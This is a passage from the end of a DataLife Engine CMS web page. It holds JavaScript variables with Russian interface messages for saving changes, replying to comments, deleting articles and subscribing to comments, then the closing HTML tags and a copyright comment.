var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
